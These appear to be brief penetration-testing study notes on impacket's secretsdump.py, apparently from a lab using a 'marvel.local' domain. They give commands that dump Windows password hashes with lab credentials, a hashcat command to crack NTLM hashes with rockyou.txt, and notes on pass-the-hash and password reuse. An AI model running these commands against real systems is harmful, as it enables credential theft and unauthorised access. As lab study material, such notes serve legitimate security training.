secretsdump.py

use this to dump passwords

installation

part of impacket

usage

$ secretsdump.py marvel.local/fcastle:Password1@192.168.122.34
$ sudo secretsdump.py MARVEL/fcastle:Password1@192.168.0.10

manually check if hashes match → for password reuse
local hashes are stored as ntlm hashes (can be passes, ntlmv2 cannot)
- cracking examples
- hashcat64 -m 1000 localhashes.text rockyou.txt
if it is empty: account might be disabled